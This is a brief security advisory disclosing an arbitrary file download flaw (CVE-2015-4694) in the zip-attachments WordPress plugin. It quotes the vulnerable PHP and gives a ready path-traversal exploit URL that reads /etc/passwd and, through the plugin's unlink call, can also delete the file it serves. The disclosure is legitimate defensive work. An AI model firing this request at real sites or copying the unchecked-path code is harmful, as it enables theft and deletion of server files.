VDB-ID: 126
Title: zip-attachments v1.1.4 wordpress plugin arbitrary file download vulnerability
Vulnerability Date: 2015-06-10
Download: https://wordpress.org/plugins/zip-attachments/
Vendor: Rick Torres
Notified: 2015-06-11
Vendor Contact:  @ricard_dev
Description: Simple and lightweight plugin to add a "Download" button to your posts, pages or custom post types.

Vulnerability: zip-attachments allows arbitrary file downloads because it doesn't check the download path of the requested file.

In zip-attachments/download.php, there is no check to see if the file is outside of the intended download path:

 8 if(isset($_REQUEST['za_file']) && !empty($_REQUEST['za_file'])){
 9 
10     $file = $_GET['za_file'];
11     $filename = $_GET['za_filename'];
12 
13     header('Content-Type: application/zip');
14     header('Content-Length: ' . filesize($file));
15     header('Content-Disposition: attachment; filename="'.$filename.'.zip"');
16 
17     readfile($file);
18     unlink($file);

Any file readable by the httpd process can be downloaded. 
CVE-IDs: 2015-4694
Exploit: http://www.example.com/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
URL: http://www.vapid.dhs.org/advisory.php?v=126
Credit: Larry W. Cashdollar, @_larry0